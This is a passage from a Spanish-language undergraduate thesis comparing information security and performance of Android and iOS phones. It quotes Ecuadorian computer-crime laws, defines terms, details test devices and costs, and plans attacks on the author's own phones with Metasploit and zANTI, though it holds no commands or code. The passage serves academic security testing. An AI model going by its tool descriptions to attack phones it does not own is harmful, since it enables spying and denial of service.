información contenida en las bandas magnéticas, chips u otro dispositivo
electrónico que esté soportado en las tarjetas de crédito, débito, pago o
similares. (Asamblea Nacional Registro Oficial, 2014, p. 36)
33
Articulo 231.- Transferencia electrónica de activo patrimonial.- La persona
que, con ánimo de lucro, altere, manipule o modifique el funcionamiento de
programa o sistema informático o telemático o mensaje de datos, para
procurarse la transferencia o apropiación no consentida de un activo
patrimonial de otra persona en perjuicio de esta o de un tercero, será
sancionada con pena privativa de libertad de tres a cinco años. Con igual pena
será sancionada la persona que facilite o proporcione datos de su cuenta
bancaria con la intención de obtener, recibir o captar de forma ilegítima un
activo patrimonial a través de una transferencia electrónica producto de este
delito para sí mismo o para otra persona. (Asamblea Nacional Registro Oficial,
2014, p. 37)
Artículo 232.- Ataque a la integridad de sistemas informáticos.- La persona
que destruya, dañe, borre, deteriore, altere, suspenda, trabe, cause mal
funcionamiento, comportamiento no deseado o suprima datos informáticos,
mensajes de correos electrónicos, de sistemas de tratamiento de información,
telemático o de telecomunicaciones a todo o partes de sus componentes
lógicos que lo rigen, será sancionada con pena privativa de libertad de tres a
cinco años. (Asamblea Nacional Registro Oficial, 2014, p. 37)
Con igual pena será sancionada la persona que:
1. Diseñe, desarrolle, programe, adquiera, envié, introduzca, ejecute, venda o
distribuya de cualquier manera, dispositivos o programas informáticos
maliciosos o programas destinados a causar los efectos señalados en el
primer inciso de este artículo. (Asamblea Nacional Registro Oficial, 2014, p.
37)
34
Articulo 234.- Acceso no consentido a un sistema informático, telemático
o de telecomunicaciones.- La persona que sin autorización acceda en todo o
parte a un sistema informático o sistema telemático o de telecomunicaciones o
se mantenga dentro del mismo en contra de la voluntad de quien tenga el
legítimo derecho, para explotar ilegítimamente el acceso logrado, modificar un
portal web, desviar o redireccionar de tráfico de datos o voz u ofrecer servicios
que estos sistemas proveen a terceros, sin pagarlos a los proveedores de
servicios legítimos, será sancionado con la pena privada de la libertad de tres
a cinco años. (Asamblea Nacional Registro Oficial, 2014, p. 37)
Capítulo segundo “Delitos contra los Derechos de libertad”
Sección sexta “Delitos contra el derecho a la intimidad
personal y familiar”
Artículo 178.- Violación a la intimidad.- La persona que, sin contar con el
consentimiento o la autorización legal, acceda, intercepte, examine, retenga,
grave, reproduzca, difunda o publique datos personales, mensajes de datos,
voz, audio y video, objetos postales, información contenida en soportes
informáticos, comunicaciones privadas o reservadas de otra persona por
cualquier medio, será sancionada con pena privada de libertad de uno a tres
años. No son aplicables estas normas para las personas que divulguen
grabaciones de audio y video en las que intervienen personalmente, ni cuando
se trata de información pública de acuerdo con lo previsto en la ley. (Asamblea
Nacional Registro Oficial, 2014, p. 30)
35
PREGUNTAS CIENTÍFICAS A CONTESTAR
¿Se puede determinar las ventajas y desventajas de las dos plataformas: Android
e iOS en los términos de seguridad de la información y rendimiento; mediante
herramientas de seguridad informática y aplicaciones benchmark?
¿Mediante el análisis comparativo en los términos de seguridad de la información
y rendimiento, se puede establecer una guía de recomendaciones a los usuarios?
VARIABLES DE LA INVESTIGACIÓN.
Variables dependientes
Recomendaciones que permita seleccionar entre las plataformas Android e iOS
Variables independientes
Seguridad de la información entre sistemas operativos Android e iOS en teléfonos
móviles.
Rendimiento entre sistemas operativos Android e iOS en teléfonos móviles.
DEFINICIONES CONCEPTUALES
Seguridad de la información
Es un activo estratégico para las organizaciones. (Cárdenas, 2012, p. 26)
Se define como la implementación de medidas, técnicas, herramientas,
estándares, leyes, entre otras, destinadas a preservar la confidencialidad, la
integridad y la disponibilidad de los sistemas y redes de cómputo y en
consecuencia la información que contienen. (Mahecha & Tavera, 2016, p. 27)
36
Seguridad informática
Es la disciplina que se ocupa de diseñar las normas, procedimientos, métodos y
técnicas destinados a conseguir un sistema de información seguro y confiable.
(Aguirre, 2006, p. 9)
Seguridad
Capacidad para alcanzar niveles aceptables de riesgo, Disponibilidad de
mecanismo que controlan y protegen la aplicación y los datos almacenados.
(Casas & Enríquez, 2014, p. 29)
Rendimiento
Es el número de procesos que se ejecutan por unidad de tiempo. (Morales, 2012)
Es decir la cantidad de procesos que se ejecutan en un tiempo determinado.
Datos
Constituye el núcleo de toda organización, hasta el punto que se tiende a
considerar que el resto de los activos están al servicio de la protección de los
datos, (Aguirre, 2006)
Información
Es un conjunto de datos tratados con el fin de reducir la incertidumbre, para
aumentar el conocimiento de algo específico. (Thompson, 2008)
37
Vulnerabilidad
Es un defecto de una aplicación que puede ser aprovechada por un atacante. Si
lo descubre, el atacante programara un software (malware) que utiliza esta
vulnerabilidad para tomar el control de la maquina (exploit) o realizar cualquier
operación no autorizada. (Roa, 2013, p. 17)
Amenazas
Es la posibilidad de ocurrencia de cualquier tipo de evento o acción que puede
producir un daño (material o inmaterial) sobre los elementos de un sistema, y en
caso de los Smathphones, sobre los elementos relacionados con la información y
el propio dispositivo hardware. (García, 2017, p. 5)
Riesgos
Estimación del grado de exposición a que una amenaza se materialice sobre uno
o más activos causando daños o perjuicios a la organización. (Salellas, 2017)
Hardware
Se trata de los equipos (servidores y terminales) que contienen las aplicaciones y
permiten su funcionamiento, a la vez que almacenan los datos del sistema de
información. (Aguirre, 2006, p. 12)
Software
Constituidos por los sistemas operativos y el conjunto de aplicaciones instaladas
en los equipos de un sistema de información que reciben y gestionan o
transforman los datos para darles el fin que se tenga establecido. (Aguirre, 2006,
p. 12)
38
Malware
Es un programa creado con un propósito malicioso para los dispositivos móviles,
donde accede sin permisos del usuario. El propósito puede ser muy diferente, pero
los más comunes actúan capturando datos personales y beneficio económico.
(Villa, 2016)
Virus
Es un software malicioso con el propósito de contaminar cualquier archivo,
modificándolos e incluso dejándolos sin funcionamiento, obsoletos. (Villa, 2016)
Gama alta de teléfonos
Son aquellos smathphones que estén dotados con casi todos los elementos más
evolucionados de la telefonía móvil, como las características, componentes,
avances, tendencias e innovaciones que proporciona la tecnología móvil. (Conde,
2017)
Gama baja de teléfonos
Son aquellos celulares inteligentes con sistemas operativos que no dan soporte a
muchas utilidades que poseen estos teléfonos de diferentes gamas. Son
diferentes a los teléfonos básicos ya que no sólo realiza y recibe llamadas, sus
funciones van más allá de estos teléfonos. (Conde, 2017)
Stand-alone
Es un software que puede ser utilizado en cualquier ordenador, sin necesidad de
ser instalado y no necesita conexión a la red para funcionar. (Alegsa, 2013)
39
Ciberdelincuentes
Personas que se dedican a actividades delictivas por medio de internet como robar
información, acceder a redes privadas, estafas y todo referente a delitos e
ilegalidad; es decir atacan a cualquier sistema informático.(Seguridadpc.net, 2017)
40
CAPÍTULO III
Análisis de factibilidad
Se realiza un análisis de factibilidad para afirmar que el proyecto es posible
realizar, mediante la evaluación de los siguientes criterios de factibilidad; a
continuación, se define cada uno de los que se han considerado para este
proyecto:
Factibilidad operativa
En la actualidad existen antecedentes de estudio con respecto a la seguridad de
la información y rendimiento debido al avance tecnológico en dispositivos móviles
y el uso masivo por las empresas y personas. La importancia que le dan los
usuarios en proteger la información es evidente por los ataques que existen a
menudo y el riesgo que corren frente a los ciberdelincuentes. Las empresas serán
los más interesados debido al uso masivo de la tecnología móvil y por lo tanto
están preocupados en proteger la información de la organización y aprovechar al
máximo los teléfonos móviles.
Para realizar el estudio de los sistemas operativos Android e iOS se cuenta con
las herramientas necesarias para el análisis comparativo de la seguridad de la
información y rendimiento, los resultados obtenidos servirán de ayuda para
empresas y personas ya que la tecnología móvil y las dos plataformas gobiernan
en los usuarios. Se planteará recomendaciones en una guía amigable que dé a
conocer los beneficios de los sistemas operativos a los usuarios interesados.
Además, para el estudio a analizar se cuenta con el personal necesario; en este
caso es la autora que realiza el trabajo de titulación.
41
Factibilidad técnica
Para el análisis comparativo se posee seis teléfonos móviles Android e iOS,
características similares y además una laptop.
Para el estudio se cuenta con tres teléfonos inteligentes de marca Samsung y tres
iPhone, por ser los más vendidos en la actualidad. Por lo tanto, son los que
mayormente están expuestos a cualquier ataque de seguridad de la información y
de tener cuidado con el rendimiento con respecto a los sistemas operativos
móviles.
A continuación, se describen las características de los equipos a utilizar tanto de
hardware como de software.
Características de los equipos para el análisis
.
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
CARACTERISTICAS
Hardware
ARQUITECTURA: ARM Cortex-A53
MODEL CPU: Quad-Core ARMv7
PROC (VFPv4, NEON) 200.0-1190.4MHz
MEMORIA RAM: 1383MB
Software
Android 6.0.1 (32 bit)
Antutu 3DBench
Antutu Benchmark v6.2.7
CUADRO N° 3
CARACTERÍSTICAS - SAMSUNG GALAXY J5
42
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
CARACTERISTICAS
Hardware
iOS Versión 10.3.3
Antutu 3DBench
Antutu Benchmark V6.3
Software
ARQUITECTURA: OS X
MODEL CPU: A6 Dual-Core
PROC (A6) 1.3 GHz
MEMORIA RAM: 1 GB
CARACTERISTICAS
Hardware
ARQUITECTURA: ARM Cortex-A53
MODEL CPU: 8 Core ARMv7
PROC (VFPv4,NEON) 1500MMHz
MEMORIA RAM: 1373MB
Software
Android Versión 5.1.1 (32-bit)
Antutu 3DBench
Antutu Benchmark V6.2.7
CUADRO N° 4
CARACTERÍSTICAS – IPHONE 5
CUADRO N° 5
CARACTERÍSTICAS - SAMSUNG GALAXY J7
43
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
Software
iOS Versión 11.0.2
Antutu 3DBench
Antutu Benchmark V6.3
CARACTERISTICAS
Hardware
ARQUITECTURA: OS X
MODEL CPU: A9 APL0898 Dual-Core
PROCESADOR: (A9) 1.8 GHz
MEMORIA RAM: 2 GB
CARACTERISTICAS
Hardware
ARQUITECTURA: ARM Cortex-A53
MODEL CPU: 8 Sansung Exynos 8895
PROCESADOR: ( 455.0-2314.0 MHz)
MEMORIA RAM: 3459MBGB
Software
Android Versión 7.0 (64bit)
Antutu 3DBench
Antutu Benchmark V6.2.7
CUADRO N° 6
CARACTERÍSTICAS - IPHONE 6S
CUADRO N° 7
CARACTERÍSTICAS – SAMSUNG GALAXY S8
44
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
Existen las tecnologías ya que se cuenta con el hardware y software necesario. El
software tiene la documentación y guías necesarias respectivamente que están
actualizadas. Para la obtención del hardware referente a los teléfonos móviles, se
ha gestionado; para adquirir y realizar el estudio. Además, está disponible el
personal con el conocimiento técnico que requiere la realización del proyecto.
CARACTERISTICAS
HardwarePROCESADOR: CORE I7
MEMORIA RAM: 8 GB
Software
Windows 10
Kali linux
Metasploit
CARACTERISTICAS
Hardware
ARQUITECTURA: OS X
MODEL CPU: A10 Quad-Core
PROC (A10 Fusion) 2.3 GHz
MEMORIA RAM: 2 GB
Software
iOS Versión 11.1.2
Antutu 3DBench
Antutu Benchmark V6.3
CUADRO N° 8
CARACTERÍSTICAS - IPHONE 7
CUADRO N° 9
CARACTERÍSTICAS - LAPTOP
45
Factibilidad legal
El Código Orgánico Integral Penal de la república del Ecuador, respalda la
seguridad de los datos en los sistemas operativos de las organizaciones y
personas, lo cual es posible realizar el análisis comparativo de Android e iOS sin
afectar a los usuarios que tengan un teléfono móvil.
Los usuarios podrán seguir con todas las funciones del teléfono móvil. Y se podrá
medir con la seguridad de la información y rendimiento en las dos plataformas.
Factibilidad económica
Para el análisis de factibilidad económica, se toma en cuenta todos los gastos y
recursos que se necesita para el desarrollo del proyecto. Los gastos y recursos
que se detallarán a continuación en el Cuadro N° 10, serán calculados para una
persona en la duración de uno a dos meses del desarrollo del trabajo de titulación.
Nombre Costo Total
Elaboracion de la
propuesta $ 700.00 $ 700.00
Transporte (Viajes) $ 110.00 $ 110.00
Alimentacion $ 200.00 $ 200.00
Total $ 1,010.00
RECURSOS HUMANOS
Nombre Costo Total
Aplicaciones de seguridad
y rendimeinto $ 0.00 $ 0.00
Herramientas de
seguridad y rendimiento $ 0.00 $ 0.00
Total $ 0.00
SOFTWARE
CUADRO N° 10
COSTO TOTAL DEL PROYECTO
46
Nombre Costo Total
Laptop $ 700.00 $ 700.00
3 Teléfonos Android $ 950.00 $ 950.00
3 Telefonos iOS $ 1,400.00 $ 1,400.00
Total $ 3,050.00
HARDWARE
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
El valor total de gastos que se observan en el cuadro anterior para la elaboración
del proyecto, tales como recursos humanos, software, gastos de oficina y servicio
básico; estos rubros son cubiertos por la autora que realiza el trabajo de titulación.
El costo total para el proyecto es un poco elevado para una persona, pero el
hardware con respecto a los teléfonos inteligentes que son de mayor costo se
posee de antemano, porque se ha realizado la gestión a personas cercanas de la
autora del trabajo de titulación, lo cual ha facilitado para la realización del análisis
comparativo del estudio.
Nombre Costo Total
Impresiones $ 80.00 $ 80.00
Gastos varios $ 20.00 $ 20.00
Total $ 100.00
GASTOS DE OFICINA
Nombre Costo Total
Internet $ 35.00 $ 35.00
Total $ 35.00
Total del proyecto $ 4,195.00
SERVICOS BÁSICOS
47
Es factible realizar el estudio del proyecto, porque a través de éste se darán a
conocer resultados de la propuesta planteada mediante el análisis establecido, lo
cual ayudará a todos los usuarios que posean y vayan a adquirir un teléfono móvil
inteligente en la actualidad y a corto plazo debido al avance tecnológico. Al realizar
el análisis comparativo de seguridad de la información y rendimiento entre Android
e iOS en los teléfonos móviles, se logrará conocer las ventajas y desventajas de
las dos plataformas, lo cual se establecerá en una guía de recomendaciones que
servirá de ayuda a los usuarios interesados del tema.
48
METODOLOGÍA DE LA INVESTIGACIÓN
DISEÑO DE LA INVESTIGACIÓN
Modalidad de la Investigación
Actualmente, debido a que no existen guías de recomendaciones de seguridad de
la información y rendimiento de los teléfonos inteligentes con respecto a los
sistemas operativos Android e iOS, ya que son las plataformas que lideran el
mercado en la actualidad. A pesar de que hay muchas herramientas que realizan
estos análisis, no existen muchos estudios referentes a este tema.
Por tal motivo, la investigación de este trabajo de titulación se enfoca en análisis
cualitativo-cuantitativo, partiendo de las versiones más utilizadas de Android e iOS
de acuerdo a resultados estadísticos adquiridos por consultoras mundiales. Este
análisis permite recoger información de los criterios a evaluar en cada término a
estudiar en los teléfonos móviles inteligentes, lo que se va a describir en una ficha
de resultados.
Con este análisis se pretende obtener los resultados y evaluar los dos términos
para establecer la guía de recomendaciones frente a los dos sistemas operativos
que lideran el mercado de los teléfonos móviles. Esperando a que los usuarios no
tomen los resultados como solución en cuanto a la seguridad de la información y
rendimiento, sino como recomendaciones que pueden ayudar al momento de
adquirir un teléfono móvil.
Enfoques que se realizan de la siguiente manera:
Cuantitativa.- Se utiliza este análisis para dar a conocer el sistema operativo con
mayor rendimiento de acuerdo a los criterios evaluados; ya que para realizar la
comparación de los dos sistemas operativos es necesario tomar en cuenta la
mínima diferencia con respecto a la puntuación de desempeño que se obtenga en
cada test realizado con las herramientas a utilizar.
Cualitativa.- Se opta por esta metodología ya que permitirá analizar la seguridad
de la información y rendimiento, comparando cada criterio elegido en los dos
términos a estudiar en Android e iOS, mediante herramientas de software; de
acuerdo a estos resultados es necesario la observación, lo cual se registrará en
49
una ficha para cada plataforma para así posteriormente determinar las diferencias
que ocurran a nivel de sistemas operativos móviles.
Tipo de investigación
Para el análisis comparativo de “seguridad de la información y rendimiento entre
Android e iOS en teléfonos móviles” se utilizarán los siguientes tipos de
investigación a continuación se describen cada una de ellas:
Investigación comparativa
Se emplea esta investigación, porque se estudiarán dos sistemas operativos
diferentes en teléfonos móviles tanto en Android e iOS, en los cuales se comparará
la seguridad de la información y rendimiento en cada plataforma; con el fin de dar
a conocer las diferencias de éstos con respecto a los términos a estudiar.
Investigación observacional
Se emplea esta investigación porque los resultados generados de las
herramientas que analizarán los términos de seguridad de la información y
rendimiento en los sistemas operativos; no serán manipulados de ninguna
manera, ya que se empleará un proceso donde los resultados serán validados
dando a conocer de manera gráfica los análisis de cada software.
Población y muestra
Población
Para el estudio comparativo se toma como población, la cantidad de versiones de
los dos sistemas operativos tanto Android como iOS del mercado de teléfono móvil
a nivel mundial del año 2017, ya que son las plataformas a analizar. Por lo cual,
se cuenta con 41 versiones de teléfonos, 26 de iOS y 15 de Android. (StatCounter,
2017)
50
Se toma en cuenta como población a las versiones, ya que la cantidad de usuarios
de las plataformas es muy grande y además porque la tecnología tiene un avance
gigante temporalmente. La industria mundial supera los 5000 millones de usuarios
de teléfonos móviles a mediados del año 2017 (GSMA, 2017). Teniendo este dato
a continuación se representa el porcentaje de los sistemas operativos de teléfonos
móviles más utilizados en el año 2017 a nivel mundial.
Fuente: (StatCounter, 2017)
Elaboración: Ruth Asqui
Fuente: (StatCounter, 2017)
En el Gráfico N° 4, se puede evidenciar el porcentaje de usuarios a nivel mundial
que poseen dispositivos móviles en el año 2017. Se puede denotar que los
sistemas operativos Android e IOS son los mayormente utilizados, según los
resultados de (StatCounter, 2017).
GRÁFICO N° 4
SISTEMAS OPERATIVOS DE TELÉFONOS MÓVILES
51
Muestra
La muestra para el análisis comparativo son seis teléfonos inteligentes; tres tienen
sistema operativo Android y los demás sistemas operativos iOS. Para el estudio
se ha elegido trabajar con las versiones más utilizadas y marcas que lideran el
mercado de la tecnología las cuales son Samsung e iPhone. Estos datos se
detallan a continuación de acuerdo a datos obtenidos de StatCounter.
Elaboración: Ruth Asqui
Fuente: (StatCounter, 2017)
En el Gráfico N° 5, se observa las versiones más utilizadas en los dispositivos
móviles de iOS. Las versiones iOS 10.3, iOS 11.0 e iOS 11.1 destacan entre éstas
y son las que se han considerado para el análisis a realizar, ya que son las más
usadas en el año 2017 por los usuarios.
GRÁFICO N° 5
VERSIONES DE SISTEMA OPERATIVO iOS
52
Elaboración: Ruth Asqui
Fuente: (StatCounter, 2017)
En el Grafico N° 6, se observa las versiones que son más utilizadas del sistema
operativo Android en el año 2017 de las cuales son Android 6.0, Android 5.1 y
Android 7.0 se consideraron como muestra para el estudio comparativo a analizar.
A continuación, se presenta los proveedores más grandes de dispositivos móviles
a nivel mundial, que más distribuyeron sus artículos en el año 2017, para hacer
referencia a los teléfonos Samsung e iPhone y seleccionar la muestra de estudio
del análisis comparativo.
GRÁFICO N° 6
VERSIONES DE SISTEMA OPERATIVO ANDROID
53
GRÁFICO N° 7
PROVEEDORES DE DISPOSITIVOS MÓVILES
Elaboración: Ruth Asqui
Fuente: (StatCounter, 2017)
En el Gráfico N° 7 se observa a Samsung como el proveedor que lidera a nivel
mundial con un porcentaje de 32.99%, seguido de Apple con 19.65% y otros en
dispositivos móviles en el año 2017, según resultados de StatCounter.
Mediante los datos obtenidos se procedió a elegir los teléfonos móviles de
Samsung e iPhone para el estudio comparativo en los términos a estudiar.
OPERACIONALIZACIÓN DE VARIABLES
La investigación se enfoca en la comparación de los sistemas operativos de
teléfonos móviles que lideran en la actualidad tales como Android e iOS, como se
detalla en la (sección de Población y muestra) para estudiar la tecnología
actualizada con respecto a los términos de seguridad de la información y
rendimiento. Para el estudio se seleccionaron criterios mediante investigaciones
actuales, las cuales serán analizadas mediante técnicas y herramientas
necesarias para obtener resultados precisos en los dos términos comparados.
54
En el desarrollo investigativo es necesario analizar las variables que influyen para
el proceso de investigación, las cuales se menciona a continuación.
Las variables independientes son “Seguridad de la información entre sistemas
operativos Android e iOS en teléfonos móviles” y “Rendimiento entre sistemas
operativos Android e iOS en teléfonos móviles” las cuales hacen referencia al
análisis de estudio en la investigación a realizar y dan lugar a la variable
dependiente “Recomendaciones que permita seleccionar entre las plataformas
Android e iOS.
En el siguiente cuadro se describe las variables dependientes e independientes,
las dimensiones, indicadores e instrumentos que se utilizaron para la
investigación.
55
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
CUADRO N° 11
OPERACIONALIZACIÓN DE VARIABLES
V.I
Seguridad de la
información entre
sistemas
operativos Android
e iOS en teléfonos
móviles.
Pilares
fundamentales de
seguridad de la
informacion:
*Disponibilidad
* Integridad
*Confidencialidad.
*Número de
Ataques exitosos
*Número de
Ataques fallidos
*Servicios
denegados
*Información
alterada
*Información
accedida
Técnicas:
Observación.
Instrumentos:
Herramientas para
el análisis de
seguridad de la
información y ficha
de observación
obtenidos en cada
ataque realizado
V.I
Rendimiento entre
sistemas
operativos Android
e iOS en teléfonos
móviles.
*Eficiencia,
eficacia del CPU
*Tiempo de
análisis de cada
test
*Desempeño del
SO
*Medicion de
CPU, RAM, 3D,
UX
*Tiempo que
tarda el test
* Cantidad de
rendimiento de
CPU, RAM, 3D,
UX
Técnicas:
Observación.
Instrumentos:
Herramienta para
el análisis de
rendimiento y ficha
de observación
obtenidos en el test
de rendimiento
realizado.
V.D
Recomendaciones
que permita
seleccionar entre
las plataformas
Android e iOS
Recomendacione
s en base al
análisis
comparativo en
los sistemas
operativos.
* Número de
recomendaciones
propuestas para
la seguridad de la
información y
rendimiento.
Técnicas:
Observación
Instrumentos:
Reporte de
recomendaciones.
56
INSTRUMENTOS DE RECOLECCIÓN DE DATOS
Las técnicas de recolección de datos ayudan a determinar cómo actúa cada
sistema operativo en cada término a estudiar. La técnica de recolección de datos
es la observación mediante el instrumento fichas de observación y test.
La ficha de observación es el instrumento donde se registran todos los resultados
que nos brinda cada herramienta que realiza el estudio de seguridad de la
información y rendimiento en los teléfonos móviles para posteriormente analizar
los resultados y dar conclusiones del estudio.
PROCEDIMIENTOS DE LA INVESTIGACIÓN
El procesamiento de la investigación surge desde el momento en que grupos de
usuarios que utilizan la tecnología móvil se sienten inconformes con respecto a
términos de seguridad de la información y rendimiento en sus teléfonos móviles.
Por lo cual se ha realizado una investigación en artículos científicos y páginas web
que realizan estudios de los sistemas operativos que lideran el mercado de la
tecnología móvil con respecto a la gran cantidad existente en el mundo. Para elegir
una población y poder realizar el análisis comparativo se procedió a investigar las
versiones que están liderando las dos plataformas, para poder establecer la
muestra de la población. (Ver sección de Población y Muestra).
Una vez determinada la muestra, se establece un procedimiento para comparar la
seguridad de la información y rendimiento en los sistemas operativos Android e
iOS mediante herramientas de software.
Es por eso que se realizó una ficha de observación para apreciar la información
que nos brinda cada herramienta utilizada y posteriormente obtener un análisis de
la seguridad de la información y rendimiento.
57
A continuación, se presenta el proceso que se realiza en esta investigación:
El problema:
Planteamiento del problema
Objetivos de la investigación
Justificación e importancia de la investigación
Marco Teórico:
Fundamentación teórica
Fundamentación legal
Preguntas científicas a contestar
Definiciones conceptuales
Metodología:
Diseño de la investigación (Tipo de investigación)
Población y Muestra
Instrumentos de recolección de datos
Operacionalización de variables, dimensiones e indicadores
Procedimientos de la investigación
Recolección de información
Procesamiento y análisis
58
RECOLECCIÓN DE INFORMACIÓN
La técnica fundamental en el desarrollo del proyecto para la recolección de
información se obtiene mediante los resultados de cada software que analiza la
seguridad de la información y rendimiento en los sistemas operativos en los
teléfonos móviles.
La principal técnica usada es la observación de los datos que se recolecta en cada
análisis, en los cuales se registra en las fichas de observación cada criterio que
se evalúa en los diferentes sistemas operativos.
El procedimiento para la recolección de datos de la ficha de observación se lleva
a cabo en el trascurso del desarrollo del capítulo 3, en Procesamiento y Análisis
de este trabajo de titulación con el objetivo de obtener resultados que nos
recalquen las diferencias de los dos sistemas operativos en los diferentes
teléfonos de cada término analizado.
El instrumento, test o prueba consiste en realizar cantidades de pruebas, tanto
para la seguridad de la información y el rendimiento en los diferentes teléfonos
móviles seleccionados para obtener resultados claros y precisos para cada
término analizado.
PROCESAMIENTO Y ANÁLISIS
Procesamiento y análisis comparativo en los sistemas
operativos móviles
Para el desarrollo del proyecto para el análisis comparativo en seguridad de la
información y rendimiento de los sistemas operativos se seguirán los siguientes
pasos:
59
1. Seleccionar criterios a evaluar, para cada término a
comparar
Se eligen criterios que influyen tanto en seguridad de la información y rendimiento
en los sistemas operativos a analizar, para poder decidir entre Android e iOS
respecto cada término a estudiar.
Los criterios fueron seleccionados mediante la investigación de artículos
científicos y estudios en donde de alguna manera se han enfocado respecto a la
seguridad de la información y rendimiento en los sistemas operativos; es por tal
motivo que se ha podido establecer los criterios para los dos términos a estudiar.
Con respecto a la seguridad de la información en la (sección de antecedentes) y
demás investigaciones realizadas se presenta estudios donde la información ha
sido vulnerada en los criterios que se han seleccionado. (Cárdenas, 2012)
A continuación, se presenta la tabla con los criterios que se evaluarán para cumplir
con los objetivos de este trabajo de titulación y dar una guía de recomendaciones
a los usuarios.
Elaboración: Ruth Asqui
Fuente: (Morales, 2012) (Cárdenas, 2012)
TÉRMINOS
SEGURIDAD DE LA
INFORMACION EN
SISTEMAS
OPERATIVOS.
Integridad de la información
Confidencialidad de la
informacion
Disponibilidad de la información
CRITERIOS
RENDIMIENTO EN
SISTEMAS
OPERATIVOS
Eficacia, eficacia,
utilización de la CPU
Tiempo de Ejecución
Desempeño
CUADRO N° 12
TÉRMINOS Y CRITERIOS DE ANÁLISIS
60
2. Seleccionar herramientas para el análisis comparativo
de seguridad de la información y rendimiento.
Mediante las herramientas se evaluarán los criterios que se han elegido tanto en
seguridad de la información y rendimiento.
Se investigaron softwares que analicen cada uno de los criterios que se ha elegido
para el análisis en cada sistema operativo; existen cantidades de herramientas
que realizar estos estudios, pero se ha elegido las más utilizados y compatibles
para los dos sistemas operativos para que los resultados dependan sólo de la
plataforma. Por lo cual se eligió Antutu Bechmark aplicación compatible para
Android e iOS para medir el rendimiento y para verificar la seguridad de la
información se eligió Metasploit y Zarti.
A continuación, se presenta la tabla de las herramientas que se seleccionó para
realizar el análisis comparativo con respecto a la seguridad de la información y
rendimiento:
61
Elaboración: Ruth Asqui
Fuente: (Morales, 2012) (Cárdenas, 2012)
CUADRO N° 13
TÉRMINOS Y CRITERIOS DE SEGURIDAD DE LA INFORMACIÓN Y RENDIMIENTO `
TÉRMINOS HERRAMIENTAS
Poderosa plataforma de
Pentesting para descubrir,
escanear y atacar redes en
forma automatizada. Realiza
mapeo de red, Sniffer, DOS,
Auditar la complejidad de las
contraseñas, etc.SEG
UR
IDA
D D
E LA
INFO
RM
AC
ION
EN
SIS
TEM
AS
OP
ERA
TIV
OS.
Disponibilidad de
la información
Integridad de la
informacion
ZANTI
(Android)
Confidencialidad
de la información
CRITERIOS JUSTIFICACIÓN
ARMITAGE -
METASPLOIT
(Kali Linux)
Tiene cientos de maneras de
atacar a cualquier sistema
operativo que se ponga en
frente. Proporciona
información acerca de
vulnerabilidades de
seguridad y ayuda en tests de
penetración.
REN
DIM
IEN
TO E
N S
ISTE
MA
S O
PER
ATI
VO
S
Eficacia, eficacia,
utilización de la
CPU
Mide el rendimiento de la
RAM, CPU, 3D y UX; testea el
terminal, fue utulizada por
Google I/O de 2014 desde
entonces se considera un
estándar industrial.
Nos da el resultado mediante
una ficha del rendimiento
total y también específica
cada criterio de evaluación
mediante puntuación.
DesempeñoANTUTU BENCHMARK
(Android e iOS,)
Cronómetro
ANTUTU BENCHMARK
(Android e iOS,)
Tiempo de
EjecuciónTiempo que Antutu tarda en
realizar el test
Es el resultado que nos
presenta Antutu después del
análisis.
62
A continuación, se describe cada herramienta a utilizar:
Benchmark
Los benchmark, son pruebas que nos permiten medir el rendimiento en los
teléfonos inteligentes. Un benchmark, es una manera de conocer si un procesador
es mejor que otro, esto se obtiene observando la ficha técnica como resultado.
(Iván, 2016)
Generalmente el análisis consiste a mayor número de núcleo y mayor frecuencia
se obtiene el mejor rendimiento en los teléfonos. Pero también influye la
arquitectura, quien termina siendo el determinante del rendimiento en el mundo
real. (Iván, 2016)
Con un benchmark, no debemos preocuparnos de la arquitectura, gigahercios y
que núcleos tengamos en los teléfonos. A mayor puntuación mejor procesador, la
medida se podrá entender sin acudir a ninguna cuantificación técnica, según el
tiempo que tarde se obtendrá la puntuación en el análisis. (Iván, 2016)
A continuación, se describe de manera breve de la aplicación Antutu Benchmark.
Antutu Benchmark
Denominada como la prueba más veloz y completa, es la aplicación para medir el
rendimiento.
Es compatible con los dispositivos Android desde la versión 2.3 o superior, al
finalizar el análisis, presenta las puntuaciones en base a las prestaciones del
Smartphone, lo cual permite realizar comparación con otros dispositivos.
(Barranger, 2014). Mientras en iOS Antutu es compatible desde iOS versión 8.0.
Para medir el rendimiento se toma dos teléfonos con características de hardware
similares y con sistemas operativos diferentes, Android (Samsung) e iOS (iPhone).
63
Antutu mide los criterios 3D (capacidad de rendimiento graficas 3D), UX
(experiencia del usuario), CPU Y RAM en cada teléfono móvil.
Para comparar la seguridad de la información tanto para Android como en iOS, se
realizará mediante las herramientas Metasploit y Zanti.
A continuación, se realiza una descripción breve de cada software:
Metasploit
Es un proyecto de seguridad informática que se encuentra en el sistema operativo
Kali Linux; permite acceder a cualquier plataforma, realizar ejecución de
vulnerabilidades y pruebas de penetración. Es un conjunto de herramientas más
utilizadas por los hacker y profesionales para realizar ataques informáticos de
manera sistematizada y automatizada. (Duarte, 2012)
Metasploit, ayudará a encontrar y ejecutar vulnerabilidades en Android e iOS,
mediante líneas de comandos, por lo cual se eligió para realizar el estudio en los
sistemas operativos referente a la seguridad de la información.
Zanti
Zanti es una herramienta compatible para Android, no se encuentra en su tienda;
realiza pruebas de penetración de redes wifi, escaneo avanzado de redes, busca
vulnerabilidades de seguridad, atacar puertos y redirecciona tráfico y ejecutar
exploit. (Solvetic Seguridad, 2017). Esta herramienta se eligió para espiar,
denegar servicios y alterar información tanto en iOS y Android por medio de la red
wifi.
64
3. Proceso de evaluación
Para los procesos, se realizan las pruebas posibles tanto en seguridad de la
información y rendimiento en los teléfonos seleccionados anteriormente de
diferentes sistemas operativos, para obtener datos en cada criterio de evaluación
y obtener resultados claros para cada término del análisis comparativo.
Seguridad de la información
Para evaluar la seguridad de la información en los sistemas operativos, se realizan
diferentes ataques a las dos plataformas utilizando Metasploit y Zanti. A
continuación, se evidencian ataques realizados a Android e iOS, analizando la
seguridad en los pilares de Disponibilidad, Integridad y Confidencialidad.
Procedimiento de análisis
ATAQUES EN SISTEMA OPERATIVO ANDROID.
Disponibilidad
